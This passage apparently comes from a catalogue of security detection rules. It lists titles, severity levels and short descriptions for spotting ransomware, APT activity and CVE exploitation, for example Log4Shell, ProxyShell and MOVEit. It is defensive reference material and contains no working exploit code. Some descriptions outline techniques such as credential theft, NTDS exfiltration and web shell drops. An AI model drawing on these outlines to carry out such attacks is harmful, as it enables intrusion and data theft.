    Description: Detects Formbook-like process executions that inject code into a set of files in the System32 folder, which execute a special command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent processes with command line parameters.
  • LockerGoga Ransomware Activity - Level: critical
    Description: Detects LockerGoga ransomware activity via specific command line.
  • Potential QBot Activity - Level: critical
    Description: Detects potential QBot activity by looking for process executions used previously by QBot
  • Potential Ryuk Ransomware Activity - Level: high
    Description: Detects Ryuk ransomware activity
  • Potential Snatch Ransomware Activity - Level: high
    Description: Detects specific process characteristics of Snatch ransomware word document droppers
  • Potential Ursnif Malware Activity - Registry - Level: high
    Description: Detects registry keys related to Ursnif malware.
  • Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 - Level: medium
    Description: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local
  • APT31 Judgement Panda Activity - Level: critical
    Description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
  • Potential Russian APT Credential Theft Activity - Level: critical
    Description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
  • Potential EmpireMonkey Activity - Level: high
    Description: Detects potential EmpireMonkey APT activity
  • Equation Group DLL_U Export Function Load - Level: critical
    Description: Detects a specific export function name used by one of EquationGroup tools
  • Mustang Panda Dropper - Level: high
    Description: Detects specific process parameters as used by Mustang Panda droppers
  • Operation Wocao Activity - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • Operation Wocao Activity - Security - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • CVE-2020-0688 Exploitation Attempt - Level: high
    Description: Detects CVE-2020-0688 Exploitation attempts
  • CVE-2020-0688 Exchange Exploitation via Web Log - Level: critical
    Description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
  • CVE-2020-0688 Exploitation via Eventlog - Level: high
    Description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
  • CVE-2020-10148 SolarWinds Orion API Auth Bypass - Level: critical
    Description: Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts
  • DNS RCE CVE-2020-1350 - Level: critical
    Description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
  • Potential Emotet Rundll32 Execution - Level: critical
    Description: Detects Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL
  • CVE-2020-5902 F5 BIG-IP Exploitation Attempt - Level: critical
    Description: Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902
  • Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195 - Level: critical
    Description: Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195
  • Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC - Level: high
    Description: Detects the execution of the commonly used ZeroLogon PoC executable.
  • Suspicious PrinterPorts Creation (CVE-2020-1048) - Level: high
    Description: Detects new commands that add new printer port which point to suspicious file
  • Exploited CVE-2020-10189 Zoho ManageEngine - Level: high
    Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
  • TerraMaster TOS CVE-2020-28188 - Level: high
    Description: Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188
  • Blue Mockingbird - Level: high
    Description: Attempts to detect system changes made by Blue Mockingbird
  • GALLIUM IOCs - Level: high
    Description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.
  • Potential Maze Ransomware Activity - Level: critical
    Description: Detects specific process characteristics of Maze ransomware word document droppers
  • Trickbot Malware Activity - Level: high
    Description: Detects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe"
  • Potential Ke3chang/TidePool Malware Activity - Level: high
    Description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020
  • EvilNum APT Golden Chickens Deployment Via OCX Files - Level: critical
    Description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report
  • Cisco ASA FTD Exploit CVE-2020-3452 - Level: high
    Description: Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (successful exploitation)
  • Oracle WebLogic Exploit CVE-2020-14882 - Level: high
    Description: Detects exploitation attempts on WebLogic servers
  • Lazarus Group Activity - Level: critical
    Description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity
  • GALLIUM Artefacts - Builtin - Level: high
    Description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
  • Leviathan Registry Key Activity - Level: critical
    Description: Detects registry key used by Leviathan APT in Malaysian focused campaign
  • Solarwinds SUPERNOVA Webshell Access - Level: critical
    Description: Detects access to SUPERNOVA webshell as described in Guidepoint report
  • UNC2452 Process Creation Patterns - Level: high
    Description: Detects specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries
  • Greenbug Espionage Group Indicators - Level: critical
    Description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
  • UNC2452 PowerShell Pattern - Level: critical
    Description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
  • Suspicious VBScript UN2452 Pattern - Level: high
    Description: Detects suspicious inline VBScript keywords as used by UNC2452
  • TAIDOOR RAT DLL Load - Level: high
    Description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load
  • Winnti Malware HK University Campaign - Level: critical
    Description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Hong Kong universities
  • Winnti Pipemon Characteristics - Level: critical
    Description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET
  • CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum - Level: critical
    Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
  • CVE-2021-31979 CVE-2021-33771 Exploits - Level: critical
    Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
  • Arcadyan Router Exploitations - Level: critical
    Description: Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.
  • Possible Exploitation of Exchange RCE CVE-2021-42321 - Level: high
    Description: Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321
  • CVE-2021-1675 Print Spooler Exploitation Filename Pattern - Level: critical
    Description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
  • Possible CVE-2021-1675 Print Spooler Exploitation - Level: high
    Description: Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675
  • CVE-2021-1675 Print Spooler Exploitation - Level: critical
    Description: Detects driver load events in the print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675
  • CVE-2021-1675 Print Spooler Exploitation IPC Access - Level: critical
    Description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527
  • Oracle WebLogic Exploit CVE-2021-2109 - Level: critical
    Description: Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109
  • CVE-2021-21972 VSphere Exploitation - Level: high
    Description: Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972
  • CVE-2021-21978 Exploitation Attempt - Level: high
    Description: Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978
  • VMware vCenter Server File Upload CVE-2021-22005 - Level: high
    Description: Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.
  • Fortinet CVE-2021-22123 Exploitation - Level: critical
    Description: Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs
  • Pulse Connect Secure RCE Attack CVE-2021-22893 - Level: high
    Description: This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)
  • Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt - Level: high
    Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
  • Potential CVE-2021-26084 Exploitation Attempt - Level: high
    Description: Detects potential exploitation of CVE-2021-26084, a Confluence RCE using OGNL injection
  • Exploitation of CVE-2021-26814 in Wazuh - Level: high
    Description: Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814
  • Potential CVE-2021-26857 Exploitation Attempt - Level: high
    Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for abnormal subprocesses spawned by Exchange Server's Unified Messaging service
  • CVE-2021-26858 Exchange Exploitation - Level: high
    Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for creation of non-standard files on disk by Exchange Server’s Unified Messaging service which could indicate dropping web shells or other malicious content
  • ProxyLogon Reset Virtual Directories Based On IIS Log - Level: critical
    Description: When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories
  • Potential CVE-2021-27905 Exploitation Attempt - Level: medium
    Description: Detects exploitation attempt of the CVE-2021-27905 which affects all Apache Solr versions prior to and including 8.8.1.
  • Exchange Exploitation CVE-2021-28480 - Level: critical
    Description: Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480
  • CVE-2021-33766 Exchange ProxyToken Exploitation - Level: critical
    Description: Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766
  • Serv-U Exploitation CVE-2021-35211 by DEV-0322 - Level: critical
    Description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322
  • Suspicious Word Cab File Write CVE-2021-40444 - Level: high
    Description: Detects file creation patterns noticeable during the exploitation of CVE-2021-40444
  • Potential CVE-2021-40444 Exploitation Attempt - Level: high
    Description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations
  • Potential Exploitation Attempt From Office Application - Level: high
    Description: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)
  • ADSelfService Exploitation - Level: high
    Description: Detects suspicious access to URLs that were noticed in cases in which attackers exploited the ADSelfService vulnerability CVE-2021-40539
  • CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit - Level: critical
    Description: Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).
  • InstallerFileTakeOver LPE CVE-2021-41379 File Create Event - Level: critical
    Description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
  • Potential CVE-2021-41379 Exploitation Attempt - Level: critical
    Description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights
  • LPE InstallerFileTakeOver PoC CVE-2021-41379 - Level: high
    Description: Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379
  • CVE-2021-41773 Exploitation Attempt - Level: high
    Description: Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
  • Sitecore Pre-Auth RCE CVE-2021-42237 - Level: high
    Description: Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx
  • Potential CVE-2021-42278 Exploitation Attempt - Level: medium
    Description: The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.
  • Suspicious Computer Account Name Change CVE-2021-42287 - Level: high
    Description: Detects the renaming of an existing computer account to an account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287
  • Grafana Path Traversal Exploitation CVE-2021-43798 - Level: critical
    Description: Detects a successful Grafana path traversal exploitation
  • CVE-2021-44077 POC Default Dropped File - Level: high
    Description: Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)
  • Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon - Level: high
    Description: Detects potential initial exploitation attempts against VMware Horizon deployments running vulnerable versions of Log4j.
  • Log4j RCE CVE-2021-44228 Generic - Level: high
    Description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)
  • Log4j RCE CVE-2021-44228 in Fields - Level: high
    Description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
  • Exchange ProxyShell Pattern - Level: high
    Description: Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)
  • Suspicious RazerInstaller Explorer Subprocess - Level: high
    Description: Detects an explorer.exe sub process of the RazerInstaller software, which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM
  • Successful Exchange ProxyShell Attack - Level: critical
    Description: Detects URL patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers
  • Potential SystemNightmare Exploitation Attempt - Level: critical
    Description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM
  • SonicWall SSL/VPN Jarrewrite Exploitation - Level: high
    Description: Detects exploitation attempts of the SonicWall Jarrewrite Exploit
  • Potential BlackByte Ransomware Activity - Level: high
    Description: Detects command line patterns used by BlackByte ransomware in different operations
  • Conti Volume Shadow Listing - Level: high
    Description: Detects a command used by Conti to find volume shadow backups
  • Conti NTDS Exfiltration Command - Level: high
    Description: Detects a command used by Conti to exfiltrate NTDS
  • Potential Conti Ransomware Activity - Level: critical
    Description: Detects a specific command used by the Conti ransomware group
  • Potential Conti Ransomware Database Dumping Activity Via SQLCmd - Level: high
    Description: Detects a command used by Conti to dump a database
  • DarkSide Ransomware Pattern - Level: critical
    Description: Detects DarkSide Ransomware and helpers
  • Potential Devil Bait Related Indicator - Level: high
    Description: Detects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" directory by uncommon processes. This behavior was commonly seen across different Devil Bait samples and stages as described by the NCSC
  • Potential Devil Bait Malware Reconnaissance - Level: high
    Description: Detects specific process behavior observed with Devil Bait samples
  • Devil Bait Potential C2 Communication Traffic - Level: high
    Description: Detects potential C2 communication related to Devil Bait malware
  • FoggyWeb Backdoor DLL Loading - Level: critical
    Description: Detects the DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor, which loads a malicious version of the expected "version.dll" DLL
  • Goofy Guineapig Backdoor IOC - Level: high
    Description: Detects malicious indicators seen used by the Goofy Guineapig malware
  • Potential Goofy Guineapig Backdoor Activity - Level: high
    Description: Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report.
  • Potential Goofy Guineapig GoolgeUpdate Process Anomaly - Level: high
    Description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor
  • Goofy Guineapig Backdoor Potential C2 Communication - Level: high
    Description: Detects potential C2 communication related to Goofy Guineapig backdoor
  • Goofy Guineapig Backdoor Service Creation - Level: critical
    Description: Detects service creation persistence used by the Goofy Guineapig backdoor
  • Moriya Rootkit File Created - Level: critical
    Description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in Securelist's Operation TunnelSnake report.
  • Pingback Backdoor File Indicators - Level: high
    Description: Detects the use of the Pingback backdoor that creates an ICMP tunnel for C2 as described in the Trustwave report
  • Pingback Backdoor DLL Loading Activity - Level: high
    Description: Detects the use of the Pingback backdoor that creates an ICMP tunnel for C2 as described in the Trustwave report
  • Pingback Backdoor Activity - Level: high
    Description: Detects the use of the Pingback backdoor that creates an ICMP tunnel for C2 as described in the Trustwave report
  • Small Sieve Malware File Indicator Creation - Level: high
    Description: Detects filename indicators that contain a specific typo seen used by the Small Sieve malware.
  • Small Sieve Malware CommandLine Indicator - Level: high
    Description: Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve.
  • Small Sieve Malware Potential C2 Communication - Level: critical
    Description: Detects potential C2 communication related to Small Sieve malware
  • Small Sieve Malware Registry Persistence - Level: high
    Description: Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware
  • HAFNIUM Exchange Exploitation Activity - Level: critical
    Description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
  • Exchange Exploitation Used by HAFNIUM - Level: high
    Description: Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity
  • REvil Kaseya Incident Malware Patterns - Level: critical
    Description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
  • APT PRIVATELOG Image Load Pattern - Level: high
    Description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
  • SOURGUM Actor Behaviours - Level: high
    Description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM
  • DEWMODE Webshell Access - Level: high
    Description: Detects access to DEWMODE webshell as described in the FireEye report
  • Potential CVE-2023-21554 QueueJumper Exploitation - Level: high
    Description: Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)
  • Potential CVE-2022-21587 Exploitation Attempt - Level: high
    Description: Detects potential exploitation attempts of CVE-2022-21587 an arbitrary file upload vulnerability impacting Oracle E-Business Suite (EBS). CVE-2022-21587 can lead to unauthenticated remote code execution.
  • Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution - Level: medium
    Description: Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. As reported by Morphisec, as part of the attack chain, threat actors used PowerShell commands that executed as child processes of the legitimate Tomcat "prunsrv.exe" process.
  • CVE-2022-24527 Microsoft Connected Cache LPE - Level: high
    Description: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache
  • Potential CVE-2022-26809 Exploitation Attempt - Level: high
    Description: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)
  • Zimbra Collaboration Suite Email Server Unauthenticated RCE - Level: medium
    Description: Detects an attempt to leverage the vulnerable servlet "mboximport" for an unauthenticated remote command injection
  • Potential CVE-2022-29072 Exploitation Attempt - Level: high
    Description: Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process.
  • CVE-2022-31659 VMware Workspace ONE Access RCE - Level: medium
    Description: Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659
  • CVE-2022-31656 VMware Workspace ONE Access Auth Bypass - Level: high
    Description: Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656. VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
  • Apache Spark Shell Command Injection - Weblogs - Level: high
    Description: Detects attempts to exploit an Apache Spark server via CVE-2014-6287 from a weblogs perspective
  • Atlassian Bitbucket Command Injection Via Archive API - Level: high
    Description: Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804
  • Potential OWASSRF Exploitation Attempt - Webserver - Level: high
    Description: Detects exploitation attempt of the OWASSRF variant targeting Exchange servers. It uses the OWA endpoint to access the PowerShell backend endpoint
  • OWASSRF Exploitation Attempt Using Public POC - Webserver - Level: critical
    Description: Detects exploitation attempt of the OWASSRF variant targeting Exchange servers using a publicly available POC. It uses the OWA endpoint to access the PowerShell backend endpoint
  • Suspicious Sysmon as Execution Parent - Level: high
    Description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)
  • Exploitation Indicator Of CVE-2022-42475 - Level: high
    Description: Detects exploitation indicators of CVE-2022-42475, a heap-based buffer overflow in sslvpnd.
  • Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877 - Level: high
    Description: Detects potential exploitation attempts that target the Centos Web Panel 7 Unauthenticated Remote Code Execution CVE-2022-44877
  • Potential CVE-2022-46169 Exploitation Attempt - Level: high
    Description: Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169
  • MSSQL Extended Stored Procedure Backdoor Maggie - Level: high
    Description: This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server
  • BlueSky Ransomware Artefacts - Level: high
    Description: Detect access to files and shares with names and extensions used by BlueSky ransomware which could indicate a current or previous encryption attempt.
  • Potential Bumblebee Remote Thread Creation - Level: high
    Description: Detects remote thread injection events based on actions seen used by Bumblebee
  • ChromeLoader Malware Execution - Level: high
    Description: Detects execution of ChromeLoader malware via a registered scheduled task
  • Emotet Loader Execution Via .LNK File - Level: high
    Description: Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022. The ".lnk" file was delivered via phishing campaign.
  • Hermetic Wiper TG Process Patterns - Level: high
    Description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022
  • Raspberry Robin Subsequent Execution of Commands - Level: high
    Description: Detects Raspberry Robin subsequent execution of commands.
  • Raspberry Robin Initial Execution From External Drive - Level: high
    Description: Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE".
  • Serpent Backdoor Payload Execution Via Scheduled Task - Level: high
    Description: Detects the post-exploitation execution technique of the Serpent backdoor. According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method. It creates a fictitious Windows event and a trigger so that once the event is created, it executes the payload.
  • Potential Raspberry Robin Dot Ending File - Level: high
    Description: Detects a command line containing a reference to files ending with a ".". This scheme has been seen used by Raspberry Robin
  • Potential ACTINIUM Persistence Activity - Level: high
    Description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.
  • FakeUpdates/SocGholish Activity - Level: high
    Description: Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell.
  • MERCURY APT Activity - Level: high
    Description: Detects suspicious command line patterns seen being used by MERCURY APT
  • MSMQ Corrupted Packet Encountered - Level: high
    Description: Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation
  • CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21 - Level: medium
    Description: Detects potential exploitation attempt of CVE-2023-1389, an unauthenticated command injection in TP-Link Archer AX21.
  • Exploitation Indicators Of CVE-2023-20198 - Level: high
    Description: Detects exploitation indicators of CVE-2023-20198, a privilege escalation vulnerability in Cisco IOS XE Software Web UI.
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux) - Level: high
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • Potential CVE-2023-2283 Exploitation - Level: medium
    Description: Detects potential exploitation attempt of CVE-2023-2283 an authentication bypass in libSSH. The exploitation method causes an error message stating that keys for curve25519 could not be generated. It is an error message that is a sign of an exploitation attempt. It is not a sign of a successful exploitation.
  • Outlook Task/Note Reminder Received - Level: low
    Description: Detects changes to the registry values related to Outlook that indicate that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.
  • CVE-2023-23397 Exploitation Attempt - Level: critical
    Description: Detects Outlook initiating a connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.
  • Potential CVE-2023-23397 Exploitation Attempt - SMB - Level: medium
    Description: Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.
  • Potential CVE-2023-23752 Exploitation Attempt - Level: high
    Description: Detects a potential exploitation attempt of CVE-2023-23752, an improper access check in web service endpoints in Joomla.
  • Potential CVE-2023-25157 Exploitation Attempt - Level: high
    Description: Detects a potential exploitation attempt of CVE-2023-25157, a SQL injection in GeoServer.
  • Potential CVE-2023-25717 Exploitation Attempt - Level: high
    Description: Detects a potential exploitation attempt of CVE-2023-25717, a remote code execution via an unauthenticated HTTP GET request in Ruckus Wireless Admin.
  • Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader - Level: high
    Description: Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.
  • Potential CVE-2023-27997 Exploitation Indicators - Level: medium
    Description: Detects indicators of potential exploitation of CVE-2023-27997 in Fortigate web logs. To avoid false positives, look for successive requests to the endpoints mentioned as well as unusual values of the "enc" parameter.
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity - Level: high
    Description: Detects file indicators of potential exploitation of MOVEit CVE-2023-34362.
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE - Level: medium
    Description: Detects the execution of "csc.exe" via the "w3wp.exe" process. MOVEit-affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files. MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll. Hunting opportunity: events from IIS dynamically compiling binaries via csc.exe on behalf of the MOVEit application, especially since May 27th, should be investigated.
  • MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request - Level: high
    Description: Detects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362
  • Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location - Level: medium
    Description: Detects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874.
  • Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation - Level: high
    Description: Detects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874.
  • Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution - Level: high
    Description: Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874
  • Potential CVE-2023-36884 Exploitation Dropped File - Level: medium
    Description: Detects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884
  • Potential CVE-2023-36884 Exploitation Pattern - Level: critical
    Description: Detects a unique pattern seen being used by RomCom potentially exploiting CVE-2023-36884
  • Potential CVE-2303-36884 URL Request Pattern Traffic - Level: high
    Description: Detects a specific URL pattern containing a specific extension and parameters pointing to an IP address. This pattern was seen being used by RomCom potentially exploiting CVE-2023-36884
  • Potential CVE-2023-36884 Exploitation - File Downloads - Level: medium
    Description: Detects files seen being requested by RomCom while potentially exploiting CVE-2023-36884
  • Potential CVE-2023-36884 Exploitation - URL Marker - Level: high
    Description: Detects a unique URL marker seen being used by RomCom potentially exploiting CVE-2023-36884
  • Potential CVE-2023-36884 Exploitation - Share Access - Level: high
    Description: Detects access to a file share with a naming schema seen being used during exploitation of CVE-2023-36884
  • CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File - Level: high
    Description: Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331
  • CVE-2023-40477 Potential Exploitation - .REV File Creation - Level: low
    Description: Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash.
  • CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process - Level: high
    Description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.
  • CVE-2023-40477 Potential Exploitation - WinRAR Application Crash - Level: medium
    Description: Detects a crash of "WinRAR.exe" where the version is lower than 6.23. This could indicate potential exploitation of CVE-2023-40477
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy - Level: high
    Description: Detects, in proxy logs, exploitation attempts of CVE-2023-43261, an information disclosure vulnerability in Milesight UR5X, UR32L, UR32, UR35 and UR41 before v35.3.0.7 that allows attackers to access sensitive router components.
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Web - Level: high
    Description: Detects, in access logs, exploitation attempts of CVE-2023-43261, an information disclosure vulnerability in Milesight UR5X, UR32L, UR32, UR35 and UR41 before v35.3.0.7 that allows attackers to access sensitive router components.
  • Potential CVE-2023-46214 Exploitation Attempt - Level: medium
